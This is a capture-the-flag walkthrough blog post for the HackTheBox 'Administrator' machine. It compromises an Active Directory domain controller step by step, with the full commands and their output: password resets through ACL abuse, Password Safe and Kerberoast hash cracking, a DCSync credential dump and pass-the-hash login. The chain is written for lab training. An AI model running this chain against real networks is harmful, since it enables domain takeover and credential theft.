Hackthebox

HTB – Administrator

In this walkthrough, I detailed how I achieved full compromise of Administrator on HackTheBox

by Croclius | Apr 20, 2025 | 0 comments

https://www.hackthebox.com/machines/Administrator

Reconnaissance

Given Credentials

As it is common in real life windows pentests, we’re given a set of credentials to start:

Olivia / ichliebedich

nmap/TCP

Nmap showed a bunch of open ports which are typical for a Domain Controller(DC).

croc@hacker$ rustscan -a 10.10.11.42 --ulimit 5000 -- -A -T5 -Pn -oA Initial
[~] Automatically increasing ulimit value to 5000.
Open 10.10.11.42:21
Open 10.10.11.42:53
Open 10.10.11.42:88
Open 10.10.11.42:135
Open 10.10.11.42:139
Open 10.10.11.42:389
Open 10.10.11.42:445
Open 10.10.11.42:464
Open 10.10.11.42:593
Open 10.10.11.42:636
Open 10.10.11.42:5985
Open 10.10.11.42:9389
Open 10.10.11.42:49664
Open 10.10.11.42:49665
Open 10.10.11.42:49666
Open 10.10.11.42:49667
Open 10.10.11.42:49669
Open 10.10.11.42:53517
Open 10.10.11.42:53528
Open 10.10.11.42:53903
Open 10.10.11.42:53908
Open 10.10.11.42:53909
[~] Starting Nmap
[>] The Nmap command to be run is nmap -A -T5 -Pn -oA Initial -vvv -p 21,53,88,135,139,389,445,464,593,636,9389,49664,49665,49666,49667,49669,53517,53528,53903,53908,53909 10.10.11.42

Starting Nmap 7.95 ( https://nmap.org ) at 2025-01-21 11:34 EST
Nmap scan report for 10.10.11.42
Host is up, received user-set (0.25s latency).
Scanned at 2025-01-21 11:34:39 EST for 91s

PORT      STATE SERVICE       REASON          VERSION
21/tcp    open  ftp           syn-ack ttl 127 Microsoft ftpd
| ftp-syst: 
|_  SYST: Windows_NT
53/tcp    open  domain        syn-ack ttl 127 Simple DNS Plus
88/tcp    open  kerberos-sec  syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-01-21 23:34:46Z)
135/tcp   open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds? syn-ack ttl 127
464/tcp   open  kpasswd5?     syn-ack ttl 127
593/tcp   open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped    syn-ack ttl 127
5985/tcp  open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        syn-ack ttl 127 .NET Message Framing
49664/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49665/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49666/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49667/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49669/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
53517/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
53528/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
53903/tcp open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
53908/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
53909/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Timing level 5 (Insane) used
Aggressive OS guesses: Microsoft Windows 10 1703 or Windows 11 21H2 (97%), Microsoft Windows Server 2022 (96%), Windows Server 2019 (95%), Microsoft Windows Server 2012 or 2012 R2 (94%), Microsoft Windows 10 1703 (93%), Windows Server 2022 (93%), Microsoft Windows Server 2016 or Server 2019 (93%), Microsoft Windows 10 1511 (93%), Microsoft Windows Server 2012 (93%), Microsoft Windows Server 2016 (93%)
No exact OS matches for host (test conditions non-ideal).
TCP/IP fingerprint:
SCAN(V=7.95%E=4%D=1/21%OT=21%CT=%CU=30024%PV=Y%DS=2%DC=T%G=N%TM=678FCCFA%P=x86_64-pc-linux-gnu)
SEQ(SP=103%GCD=1%ISR=10C%TI=I%CI=I%II=I%SS=S%TS=A)
SEQ(SP=108%GCD=1%ISR=10C%TI=I%CI=I%TS=A)
OPS(O1=M53CNW8ST11%O2=M53CNW8ST11%O3=M53CNW8NNT11%O4=M53CNW8ST11%O5=M53CNW8ST11%O6=M53CST11)
WIN(W1=FFFF%W2=FFFF%W3=FFFF%W4=FFFF%W5=FFFF%W6=FFDC)
ECN(R=Y%DF=Y%T=80%W=FFFF%O=M53CNW8NNS%CC=Y%Q=)
T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=0%Q=)
T2(R=Y%DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)
T3(R=Y%DF=Y%T=80%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)
T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)
T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)
T6(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)
T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)
U1(R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)
IE(R=Y%DFI=N%T=80%CD=Z)

Uptime guess: 0.274 days (since Tue Jan 21 05:02:05 2025)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=264 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 35406/tcp): CLEAN (Couldn't connect)
|   Check 2 (port 20522/tcp): CLEAN (Couldn't connect)
|   Check 3 (port 52617/udp): CLEAN (Failed to receive data)
|   Check 4 (port 52572/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
|_clock-skew: 6h59m59s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2025-01-21T23:35:55
|_  start_date: N/A

TRACEROUTE (using port 445/tcp)
HOP RTT       ADDRESS
1   281.14 ms 10.10.14.1
2   301.15 ms 10.10.11.42

Nmap done: 1 IP address (1 host up) scanned in 93.79 seconds
           Raw packets sent: 85 (6.902KB) | Rcvd: 92 (6.282KB)

We can see the hostname of DC in the output so let's add it into the hosts file:

croc@hacker:~$ sudo sed -i '$a10.10.11.42tDC.administrator.htb administrator.htb' /etc/hosts

Ldapdomaindump - 389/tcp

I started by looking at our environment and evaluating the attack surface:

croc@hacker$ sudo /usr/bin/ldapdomaindump ldap://10.10.11.42 -u 'ADMINISTRATOROlivia' -p 'ichliebedich'  
[*] Connecting to host...
[*] Binding to host
[+] Bind OK
[*] Starting domain dump
[+] Domain dump finished
                                                                                                                         
croc@hacker$ ls
domain_computers_by_os.html  domain_groups.grep  domain_policy.html  domain_trusts.json          domain_users.json
domain_computers.grep        domain_groups.html  domain_policy.json  domain_users_by_group.html
domain_computers.html        domain_groups.json  domain_trusts.grep  domain_users.grep
domain_computers.json        domain_policy.grep  domain_trusts.html  domain_users.html

croc@hacker$ firefox domain_users_by_group.html

This gave me a clear understanding of all the users and groups on the target. I have the habit of creating a users.txt file that comes very handy afterwards when password spraying.

image 41

I found out that olivia, who we currently own, is the part of Remote Management Users.

image 42

As port 5985/tcp is open, we can get evil-winrm shell access as olivia & see what we can do from there.

Evil-WinRM

I got the WinRM access but didn't find anything juicy here!

croc@hacker$ sudo evil-winrm -i 10.10.11.42 -u olivia -p ichliebedich  
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:UsersoliviaDocuments>

Time to move on to other options!

SMB - 139/445

I enumerated the available shares using the given credentials. The credentials are valid however, we are certainly not going to have access to the privileged shares like Admin$ or C$ as a low-level user.

croc@hacker$ sudo nxc smb 10.10.11.42 -u 'Olivia' -p 'ichliebedich' --shares 
SMB         10.10.11.42     445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.42     445    DC               [+] administrator.htbOlivia:ichliebedich
SMB         10.10.11.42     445    DC               [*] Enumerated shares
SMB         10.10.11.42     445    DC               Share           Permissions     Remark
SMB         10.10.11.42     445    DC               -----           -----------     ------
SMB         10.10.11.42     445    DC               ADMIN$                          Remote Admin
SMB         10.10.11.42     445    DC               C$                              Default share
SMB         10.10.11.42     445    DC               IPC$            READ            Remote IPC
SMB         10.10.11.42     445    DC               NETLOGON        READ            Logon server share
SMB         10.10.11.42     445    DC               SYSVOL          READ            Logon server share

FTP - 21/tcp

The credentials Olivia:ichliebedich doesn't appear to be valid for the FTP Service:

image

Anonymous access is also not permitted:

image 2
Think Box
In order to find a way in, I shifted my focus to enumerating potential pathways using BloodHound graphs.

BloodHound - 389/tcp

I dumped the .json configuration files using Python BloodHound Ingestor & uploaded the data in bloodhound.

croc@hacker$ sudo ntpdate dc.administrator.htb

croc@hacker$ bloodhound-python -c All -u 'olivia' -p 'ichliebedich' -d 'administrator.htb' -ns 10.10.11.42
INFO: Found AD domain: administrator.htb
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc.administrator.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc.administrator.htb
INFO: Found 11 users
INFO: Found 53 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: dc.administrator.htb
INFO: Done in 00M 52S
                                                                                                                         
croc@hacker$ ls
20250121123032_computers.json   20250121123032_domains.json  20250121123032_groups.json  20250121123032_users.json
20250121123032_containers.json  20250121123032_gpos.json     20250121123032_ous.jsons

I marked olivia as owned & found out that it has GenericAll permissions over michael. That means full control! This privilege allows the trustee to manipulate the target object however they wish.

image 43

Shell as Michael

Changing the Password of Michael

As olivia has full control over michael, she must be able to change his password. I used bloodyAD to do that:

croc@hacker$ bloodyAD -u 'olivia' -p 'ichliebedich' -d 'Administrator.htb' --host '10.10.11.42' set password 'Michael' 'Pass@1234'
[+] Password changed successfully!

WinRM Access

As michael is a remote management user, we can gain a evil-winrm shell as michael:

croc@hacker$ sudo evil-winrm -i 10.10.11.42 -u 'michael' -p 'Pass@1234'
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:UsersmichaelDocuments>

However, I didn't find anything useful here! Let's move on!

Shell as Emily

Reviewing BloodHound Graphs

As we own a new user, it's always a good practice to look back at the bloodhound graphs.

image 44

The user michael has the capability to change the user benjamin's password without knowing that his current password.

Changing the Password for Benjamin

I successfully changed the password for benjamin to supportmeonPatreon:

croc@hacker:~$ bloodyAD -u 'michael' -p 'Pass@1234' -d 'Administrator.htb' --host '10.10.11.42' set password 'Benjamin' 'supportmeonPatreon'
[+] Password changed successfully!

We own another user. Hurrah😁!!

Share Enumeration

BloodHound

Looking at the bloodhound graphs, I found out that benjamin is a part of Share Moderators group.

image 45

Through enumeration on Google, I found out that:

The members of this group possess explicit permissions to access shared resources like SMB or FTP shares.

SMB

The password change was successful but we don't have any additional access via SMB:

croc@hacker$ nxc smb 10.10.11.42 -u 'benjamin' -p 'supportmeonPatreon' --shares     
SMB         10.10.11.42     445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.42     445    DC               [+] administrator.htbbenjamin:supportmeonPatreon 
SMB         10.10.11.42     445    DC               [*] Enumerated shares
SMB         10.10.11.42     445    DC               Share           Permissions     Remark
SMB         10.10.11.42     445    DC               -----           -----------     ------
SMB         10.10.11.42     445    DC               ADMIN$                          Remote Admin
SMB         10.10.11.42     445    DC               C$                              Default share
SMB         10.10.11.42     445    DC               IPC$            READ            Remote IPC
SMB         10.10.11.42     445    DC               NETLOGON        READ            Logon server share 
SMB         10.10.11.42     445    DC               SYSVOL          READ            Logon server share

FTP

I successfully logged in as benjamin using our new password. Additionally, I found a backup file.

croc@hacker$ ftp benjamin@DC.administrator.htb
Connected to DC.administrator.htb.
220 Microsoft FTP Service
331 Password required
Password: 
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
229 Entering Extended Passive Mode (|||64177|)
125 Data connection already open; Transfer starting.
10-05-24  08:13AM                  952 Backup.psafe3
226 Transfer complete.
ftp>

I transferred it to my machine.

ftp> prompt off
Interactive mode off.
ftp> mget *
local: Backup.psafe3 remote: Backup.psafe3
229 Entering Extended Passive Mode (|||64184|)
125 Data connection already open; Transfer starting.
100% |*****************************************************************************************|   952        3.86 KiB/s    00:00 ETA
226 Transfer complete.
WARNING! 3 bare linefeeds received in ASCII mode.
File may not have transferred correctly.
952 bytes received in 00:00 (3.84 KiB/s)
ftp>

Backup File

Backup.psafe3

This file is a Password Safe database file which is a popular open-source password manager. Through enumeration, I found out that these type of files are protected by a master password.

croc@hacker$ file Backup.psafe3                
Backup.psafe3: Password Safe V3 database

Cracking the Master Password

In order to view the passwords stored in this database file, we need its master password. Luckily, there is a JTR utility called pwsafe2john which we can utilize to convert this database file into crackable hashes allowing us to attempt password cracking using john.

croc@hacker$ pwsafe2john Backup.psafe3 > backup.hashes
                                                                                                                                      
croc@hacker$ ls
backup.hashes  Backup.psafe3

croc@hacker$ john backup.hashes --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (pwsafe, Password Safe [SHA256 128/128 AVX 4x])
Cost 1 (iteration count) is 2048 for all loaded hashes
Will run 3 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
tekieromucho     (Backu)     
1g 0:00:00:02 DONE (2025-01-21 15:23) 0.4975g/s 3056p/s 3056c/s 3056C/s Liverpool..iheartyou
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

Hurrah!! The master password has been successfully cracked!

Install Password Safe Password Manager

Install PasswordSafe using the following command:

croc@hacker$ sudo apt update -y && sudo apt install passwordsafe -y

After installed, you can access it via CLI using the command pwsafe or run it manually through Applications.

View the Database File

1. Once installed, open it & you will see the following dialog box:

croc@hacker$ pwsafe Backup.psafe3&
[1] 198610

image 3

2. Enter the master password we just cracked. Then, hit OK.

image 4

3. Here, we found the passwords for 3 other accounts:

image 5

4. Copy and paste all these passwords into mousepad or gedit for later use.

image 49

WinRM Access

As emily is a remote management user,

croc@hacker$ sudo evil-winrm -i 10.10.11.42 -u 'emily' -p 'UXLCI5iETUsIBoFVTj8yQFKoHjXmb'
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:UsersemilyDocuments>

user.txt

*Evil-WinRM* PS C:Usersemilydesktop> ls


    Directory: C:Usersemilydesktop


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----        10/30/2024   2:23 PM           2308 Microsoft Edge.lnk
-ar---         1/21/2025   8:11 PM             34 user.txt


*Evil-WinRM* PS C:Usersemilydesktop> cat user.txt
4a86a2************************

Shell as Root

BloodHound

As we have compromised a bunch of other users, we must return to the bloodhound graphs and see what we can do. I found out that emily has GenericWrite permissions over ethan:

image 50
Think Box
We have three potential attack vectors: Shadow Credentials, Forced Password Reset, and Targeted Kerberoasting. The first two options were unsuccessful so we are going with targeted kerberoasting.

Targeted Kerberoasting

As an attacker, what we do is add a SPN to the target account. Once an account has a SPN, it becomes vulnerable to kerberoasting attack. You can read more about it here.

We will be using the following script in order to perform this attack:

targetedKerberoast
GitHub - ShutdownRepo/targetedKerberoast: Kerberoast with ACL abuse capabilities
Kerberoast with ACL abuse capabilities. Contribute to ShutdownRepo/targetedKerberoast development by creating an account on GitHub.
favicongithub.com

Step#1: Dump the Hash

The hash has been successfully dumped by script:

croc@hacker:/opt/targetedKerberoast$ python3 targetedKerberoast.py -v -d 'administrator.htb' -u 'emily' -p 'UXLCI5iETUsIBoFVTj8yQFKoHjXmb' --dc-ip '10.10.11.42'
[*] Starting kerberoast attacks
[*] Fetching usernames from Active Directory with LDAP
[VERBOSE] SPN added successfully for (ethan)
[+] Printing hash for (ethan)
$krb5tgs$23$*ethan$ADMINISTRATOR.HTB$administrator.htb/ethan*$fff79301f8fe782e17c7fb5d857e5c24$03bec9263f5408d18be2724fa3f6db1562aba7aa9cd2b3ae867714121b84c9739845788db09052ee101765ed0959f2e1dcebcad602f881ffa7e2a6b14883fa1d5c46b859aaee9c3fe568ced9afa0681413b7f310fc6a6cc6bad1d39a55a4c9cb311acbdb7599d4ccf69f8ad923b67d3c0ad9bf0548a3d053ab4cfe03c8feb4ad23a8bea60f0906f60330d55cb4f7c419bb4f9670aa91c9b041e9cc1ae75acb37241f5b9375a30e10b592131e463d3dacb1c6d1c2136699b88ebdca53814cce6d34695ea97f6a0323757494b17ed43690ac96cfef7d3d1b19fb03a4ff6096dbf698d19f9f712c5fcf062021580cbd6e153803bde9bacce0b6e3854f8443af063c48c28043064db82d5d3e9e144d3e84e4cd597c5395c5daaa37aef4979a9eb70a75759d3d7e33eb7dfe7ac3ce7dd3da88954ef3c04dba2a2136e70d76a725164b17f1a19acc39db8b8a15b37794ca97924b38fdd839229efd6109becb8084199ab07714d0f108ea003848169ad6aa5be2dcd34fd054a984bbbe040d36a6fa7a270159ded958a2a2cbccb23343ccfd1f61c43a26af21f40e6693fea688d409afe3e27e279c8c5df1a45a9f213db9508fa91763fc0f68f16982addddc86b2963328545358f43795fed9ecf30efae91d1877e1ef6f551c1a8febde68e976d7d72d36d5a504695eafded2fb885a0541af60f61cd25ac9b83257e94758227b2db1ebe9b9ce8a303535632c8c9f7e3cfa76fdeed33d3f57cd7f6db1c94c3f3a06a256939fec217abe561093b1b48d4b23e8336406dda34903c567316a8d0851376b631b411fa7cd96c07e2979d8ac89b8fc23eff76c0cda93197cc93b35cdebc6cc63a9fc0aa10246f77f988fa75e1644ab78d05a3e95dea386e1b07d2ba901f55dd972cf8546871571fa35b20d9f4bc10ad3798e000f4bdef49ee3b848821e6a769768e8b11cc4ab910d8767b29e5c046561a7abe5e2576c772f30c7d4e70e4e21b982b4429fc5239ea841f2dcdf560b21d5e72f0cf4190c8bafc099723c431a5c40e1d5a9df1bce11fdd05158a0821d2cefb9b240b94f0e99e0466b1e4cfefa64aa081bca49d2f036e36d785ec18310812fbbe574d0663aa243e1a2d58b885e3321defc23684a294c6ae56097914dfaec9f799d37fa331afff32dc14bdcb69327a926be2638668124032bb930a4f3ed3d2636b8a23b7f6a2c38bfd714436ccf63ae61fd854b4ca56d19a0249289b99354265c6316163a3a13cdf9520840ae4869de9b563656ee10fdf95a2cead9d284f54c7f8bfb04bbbc3fdf082f9743f7abda03f1be6b3a8818d405fa00c159d7e897830bb316b3b1a36cff6812c4fdc753049531b34731ea9f5362138f76e8b351241c279dac5d9da6cdeba6e1daf3ec4cf5ca572e293a30020eba7133ad5365888d7edd0f6eb588bbd22a62758e58b9463689e87e599ed64739a5dea443ad527dd6440acc508f0cdc28d5ac7e3bf4628d262f798d8e00950e9f81853855a1f2005bbe2a6a15adfa6b173b1f3fc592455418a6
[VERBOSE] SPN removed successfully for (ethan)

Step#2: Crack the Hash

Hashcat successfully cracked the hash:

croc@hacker$ hashcat -m 13100 hashes.txt /usr/share/wordlists/rockyou.txt 
hashcat (v6.2.6) starting

$krb5tgs$23$*ethan$ADMINISTRATOR.HTB$administrator.htb/ethan*$fff79301f8fe782e17c7fb5d857e5c24$03bec9263f5408d18be2724fa3f6db1562aba7aa9cd2b3ae867714121b84c9739845788db09052ee101765ed0959f2e1dcebcad602f881ffa7e2a6b14883fa1d5c46b859aaee9c3fe568ced9afa0681413b7f310fc6a6cc6bad1d39a55a4c9cb311acbdb7599d4ccf69f8ad923b67d3c0ad9bf0548a3d053ab4cfe03c8feb4ad23a8bea60f0906f60330d55cb4f7c419bb4f9670aa91c9b041e9cc1ae75acb37241f5b9375a30e10b592131e463d3dacb1c6d1c2136699b88ebdca53814cce6d34695ea97f6a0323757494b17ed43690ac96cfef7d3d1b19fb03a4ff6096dbf698d19f9f712c5fcf062021580cbd6e153803bde9bacce0b6e3854f8443af063c48c28043064db82d5d3e9e144d3e84e4cd597c5395c5daaa37aef4979a9eb70a75759d3d7e33eb7dfe7ac3ce7dd3da88954ef3c04dba2a2136e70d76a725164b17f1a19acc39db8b8a15b37794ca97924b38fdd839229efd6109becb8084199ab07714d0f108ea003848169ad6aa5be2dcd34fd054a984bbbe040d36a6fa7a270159ded958a2a2cbccb23343ccfd1f61c43a26af21f40e6693fea688d409afe3e27e279c8c5df1a45a9f213db9508fa91763fc0f68f16982addddc86b2963328545358f43795fed9ecf30efae91d1877e1ef6f551c1a8febde68e976d7d72d36d5a504695eafded2fb885a0541af60f61cd25ac9b83257e94758227b2db1ebe9b9ce8a303535632c8c9f7e3cfa76fdeed33d3f57cd7f6db1c94c3f3a06a256939fec217abe561093b1b48d4b23e8336406dda34903c567316a8d0851376b631b411fa7cd96c07e2979d8ac89b8fc23eff76c0cda93197cc93b35cdebc6cc63a9fc0aa10246f77f988fa75e1644ab78d05a3e95dea386e1b07d2ba901f55dd972cf8546871571fa35b20d9f4bc10ad3798e000f4bdef49ee3b848821e6a769768e8b11cc4ab910d8767b29e5c046561a7abe5e2576c772f30c7d4e70e4e21b982b4429fc5239ea841f2dcdf560b21d5e72f0cf4190c8bafc099723c431a5c40e1d5a9df1bce11fdd05158a0821d2cefb9b240b94f0e99e0466b1e4cfefa64aa081bca49d2f036e36d785ec18310812fbbe574d0663aa243e1a2d58b885e3321defc23684a294c6ae56097914dfaec9f799d37fa331afff32dc14bdcb69327a926be2638668124032bb930a4f3ed3d2636b8a23b7f6a2c38bfd714436ccf63ae61fd854b4ca56d19a0249289b99354265c6316163a3a13cdf9520840ae4869de9b563656ee10fdf95a2cead9d284f54c7f8bfb04bbbc3fdf082f9743f7abda03f1be6b3a8818d405fa00c159d7e897830bb316b3b1a36cff6812c4fdc753049531b34731ea9f5362138f76e8b351241c279dac5d9da6cdeba6e1daf3ec4cf5ca572e293a30020eba7133ad5365888d7edd0f6eb588bbd22a62758e58b9463689e87e599ed64739a5dea443ad527dd6440acc508f0cdc28d5ac7e3bf4628d262f798d8e00950e9f81853855a1f2005bbe2a6a15adfa6b173b1f3fc592455418a6:limpbizkit

Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 13100 (Kerberos 5, etype 23, TGS-REP)
Hash.Target......: $krb5tgs$23$*ethan$ADMINISTRATOR.HTB$administrator....5418a6
Time.Started.....: Tue Jan 21 23:42:31 2025 (0 secs)
Time.Estimated...: Tue Jan 21 23:42:31 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:    76395 H/s (4.12ms) @ Accel:256 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 5376/14344385 (0.04%)
Rejected.........: 0/5376 (0.00%)
Restore.Point....: 4608/14344385 (0.03%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: Liverpool -> ginuwine
Hardware.Mon.#1..: Util: 40%

Started: Tue Jan 21 23:41:00 2025
Stopped: Tue Jan 21 23:42:33 2025

So, the password for ethan is limpbizkit. Congratulations, we owned another user!

Revisiting BloodHound

The user ethan has the following privileges on the domai:

  • DS-Replication-Get-Changes
  • DS-Replication-Get-Changes-In-Filtered-Set
  • DS-Replication-Get-Changes-All

These privileges allows ethan to perform a DCSync attack.

image 52

DCSync Attack

In this attack, an attacker simulates the behavior of a domain controller and retrieve password data or NTDS.dit via Domain Replication. Watch this video or read this for a better understanding.

I used secretsdump to perform the DCSync attack and dumped the NTDS.dit:

croc@hacker$ impacket-secretsdump administrator.htb/'ethan':'limpbizkit'@10.10.11.42
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Dumping Domain Credentials (domainuid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:3dc553ce4b9fd20bd016e098d2d2fd2e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:1181ba47d45fa2c76385a82409cbfaf6:::
administrator.htbolivia:1108:aad3b435b51404eeaad3b435b51404ee:fbaa3e2294376dc0f5aeb6b41ffa52b7:::
administrator.htbmichael:1109:aad3b435b51404eeaad3b435b51404ee:8864a202387fccd97844b924072e1467:::
administrator.htbbenjamin:1110:aad3b435b51404eeaad3b435b51404ee:95687598bfb05cd32eaa2831e0ae6850:::
administrator.htbemily:1112:aad3b435b51404eeaad3b435b51404ee:eb200a2583a88ace2983ee5caa520f31:::
administrator.htbethan:1113:aad3b435b51404eeaad3b435b51404ee:5c2b9f97e0620c3d307de85a93179884:::
administrator.htbalexander:3601:aad3b435b51404eeaad3b435b51404ee:cdc9e5f3b0631aa3600e0bfec00a0199:::
administrator.htbemma:3602:aad3b435b51404eeaad3b435b51404ee:11ecd72c969a57c34c819b41b54455c9:::
DC$:1000:aad3b435b51404eeaad3b435b51404ee:cf411ddad4807b5b4a275d31caa1d4b3:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:9d453509ca9b7bec02ea8c2161d2d340fd94bf30cc7e52cb94853a04e9e69664
Administrator:aes128-cts-hmac-sha1-96:08b0633a8dd5f1d6cbea29014caea5a2
Administrator:des-cbc-md5:403286f7cdf18385
krbtgt:aes256-cts-hmac-sha1-96:920ce354811a517c703a217ddca0175411d4a3c0880c359b2fdc1a494fb13648
krbtgt:aes128-cts-hmac-sha1-96:aadb89e07c87bcaf9c540940fab4af94
krbtgt:des-cbc-md5:2c0bc7d0250dbfc7
administrator.htbolivia:aes256-cts-hmac-sha1-96:713f215fa5cc408ee5ba000e178f9d8ac220d68d294b077cb03aecc5f4c4e4f3
administrator.htbolivia:aes128-cts-hmac-sha1-96:3d15ec169119d785a0ca2997f5d2aa48
administrator.htbolivia:des-cbc-md5:bc2a4a7929c198e9
administrator.htbmichael:aes256-cts-hmac-sha1-96:b360c36cb6777b8cc3d88ab1aa60f0064e6ea4fc9b9a4ebacf66345118c0e959
administrator.htbmichael:aes128-cts-hmac-sha1-96:bc3c8269d1a4a82dc55563519f16de8b
administrator.htbmichael:des-cbc-md5:43c2bc231598012a
administrator.htbbenjamin:aes256-cts-hmac-sha1-96:a0bbafbc6a28ed32269e6a2cc2a0ccb35ac3d7314633815768f0518ebae6847f
administrator.htbbenjamin:aes128-cts-hmac-sha1-96:426ca56d39fe628d47066fc3448b645e
administrator.htbbenjamin:des-cbc-md5:b6f84a864376a4ad
administrator.htbemily:aes256-cts-hmac-sha1-96:53063129cd0e59d79b83025fbb4cf89b975a961f996c26cdedc8c6991e92b7c4
administrator.htbemily:aes128-cts-hmac-sha1-96:fb2a594e5ff3a289fac7a27bbb328218
administrator.htbemily:des-cbc-md5:804343fb6e0dbc51
administrator.htbethan:aes256-cts-hmac-sha1-96:e8577755add681a799a8f9fbcddecc4c3a3296329512bdae2454b6641bd3270f
administrator.htbethan:aes128-cts-hmac-sha1-96:e67d5744a884d8b137040d9ec3c6b49f
administrator.htbethan:des-cbc-md5:58387aef9d6754fb
administrator.htbalexander:aes256-cts-hmac-sha1-96:b78d0aa466f36903311913f9caa7ef9cff55a2d9f450325b2fb390fbebdb50b6
administrator.htbalexander:aes128-cts-hmac-sha1-96:ac291386e48626f32ecfb87871cdeade
administrator.htbalexander:des-cbc-md5:49ba9dcb6d07d0bf
administrator.htbemma:aes256-cts-hmac-sha1-96:951a211a757b8ea8f566e5f3a7b42122727d014cb13777c7784a7d605a89ff82
administrator.htbemma:aes128-cts-hmac-sha1-96:aa24ed627234fb9c520240ceef84cd5e
administrator.htbemma:des-cbc-md5:3249fba89813ef5d
DC$:aes256-cts-hmac-sha1-96:98ef91c128122134296e67e713b233697cd313ae864b1f26ac1b8bc4ec1b4ccb
DC$:aes128-cts-hmac-sha1-96:7068a4761df2f6c760ad9018c8bd206d
DC$:des-cbc-md5:f483547c4325492a
[*] Cleaning up...

Domain Admin

Finally, we can leverage a Pass-the-Hash (PtH) attack to authenticate as the Domain Administrator on the domain controller.

croc@hacker$ sudo evil-winrm -i 10.10.11.42 -u 'administrator' -H '3dc553ce4b9fd20bd016e098d2d2fd2e'    
[sudo] password for croc: 
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
